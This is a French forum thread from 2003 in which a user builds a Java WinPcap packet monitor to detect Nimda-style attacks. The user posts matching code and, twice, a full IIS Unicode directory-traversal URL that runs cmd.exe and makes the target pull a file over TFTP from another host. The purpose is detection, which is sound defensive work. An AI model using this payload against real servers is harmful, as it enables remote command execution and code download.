blocage de passage des paquets de la couche réseau vers la couche trans - Page 1

1

Le 03/09/2003 à 19:55

Bonjour;
J'ai dressé un moniteur réseau pour suivre le trafic de données ciblant ma machine locale ,et ceci pour avoir la possibilité de filtrer les paquets dits dangereux .
a titre d'exemple j'ai traité les paquets qui contiennent dans leurs partie donnée une des chaînes Unicodes utilisées par le Nimda pour obtenir un accès en tant qu’administrateur à la machine cible.

mon analyse donc se fait au niveau de lacouche réseau .
Mon probleme est comment ou quelle est la fonction qui permet de bloquer le passage des paquets suspects de la couche réseau vers la couche de transport.

cordialement.

2

Le 05/09/2003 à 17:43

Je ne m'y connais pas, mais a mon avis on ne peut pas bloquer les paquets.
Il faut lire tous les paquets arrivant, les traiter, puis les reenvoyer aux applis.
Tu veux faire un fireware, quoi ?

3

Le 06/10/2003 à 18:39

Je cherche à comparer la partie donnée des paquets capturés avec un fichier (texte XXX)
voici le code :

FileReader fw;
BufferedReader input;
String line,httpLine;

line=new String();

fw = new FileReader("chemin sur disque file.txt");
input = new BufferedReader(fw);

try
{

BufferedReader Dhttp = new BufferedReader(new StringReader(new String(tcpPacket.data)));
while((httpLine =Dhttp.readLine())!=null)
{
// Récupération des données du fichier .txt
while((line = input.readLine())!=null)
{
if(httpLine.equals(line))
{
Action;

break;
}
}

if (!test) break;

}
}

Je fais une capture et analyse des paquets ciblant ma machine
Disant qu’une machine distante fait un transfert de fichier en utilisant le protocole TFTP avec la requête suivante :

http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe%20-i%20posteXX%20GET%20win2000.gif

ceci fait le transfert du fichier win2000.gif du posteXX vers 192.168.0.2 .
Existe t-il une méthode en java qui permet d’avoir le contenu de ce fichier

comment peut on détecté ce transfert ?
est ce que on peut mettre le contenu de win2000.gif dans le fichier texte(xxx)
en bref je veut faire une analyse selon le contenu d’un fichier et pas son nom.

Je vous informe que je travail sous NT2000 avec prise en charge de winpcap explotant les fonctions de Libpacap.

je pose le proleme autrement:

je fais un transfert de fichier par des requettes http utilisant le protocole tftp . je cré un bloc note nomé

bon

qui contien la chaine "bonjour" . je fais un transfert du fichier

bon

d'un poste A vers un poste B par la requette :
[code]http://http://@ip poste B/scripts/..%255c../winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe%20-i%20posteA%20GET%20bon.txt[/code]

le transfert se fait leplus normalement du monde
Au niveau du poste B je fais une capture de données . j'arrive pas a trouvé de critére qui me permet de détecter l'action de transfert du fichier

bon

;ceci en se basant sur son contenu et pas sur le nom du fichier qui figure sur la chaine.

4

Le 06/10/2003 à 18:46

Je cherche à comparer la partie donnée des paquets capturés avec un fichier (texte XXX)
voici le code :

FileReader fw;
BufferedReader input;
String line,httpLine;

line=new String();

fw = new FileReader("chemin sur disque file.txt");
input = new BufferedReader(fw);

try
{

BufferedReader Dhttp = new BufferedReader(new StringReader(new String(tcpPacket.data)));
while((httpLine =Dhttp.readLine())!=null)
{
// Récupération des données du fichier .txt
while((line = input.readLine())!=null)
{
if(httpLine.equals(line))
{
Action;

break;
}
}

if (!test) break;

}
}

Je fais une capture et analyse des paquets ciblant ma machine
Disant qu’une machine distante fait un transfert de fichier en utilisant le protocole TFTP avec la requête suivante :

http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe%20-i%20posteXX%20GET%20win2000.gif

ceci fait le transfert du fichier win2000.gif du posteXX vers 192.168.0.2 .
Existe t-il une méthode en java qui permet d’avoir le contenu de ce fichier

comment peut on détecté ce transfert ?
est ce que on peut mettre le contenu de win2000.gif dans le fichier texte(xxx)
en bref je veut faire une analyse selon le contenu d’un fichier et pas son nom.

Je vous informe que je travail sous NT2000 avec prise en charge de winpcap explotant les fonctions de Libpacap.

je pose le proleme autrement:

je fais un transfert de fichier par des requettes http utilisant le protocole tftp .
je cré un bloc note nomé (bon)qui contien la chaine "bonjour" .
je fais un transfert du fichier (bon)d'un poste A vers un poste B par la requette :
http://http://@ip poste B/scripts/..%255c../winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe%20-i%20posteA%20GET%20bon.txt

le transfert se fait leplus normalement du monde
Au niveau du poste B je fais une capture de données .
j'arrive pas a trouvé de critére qui me permet de détecter l'action de transfert du fichier (bon);ceci en se basant sur son contenu et pas sur le nom du fichier qui figure sur la chaine.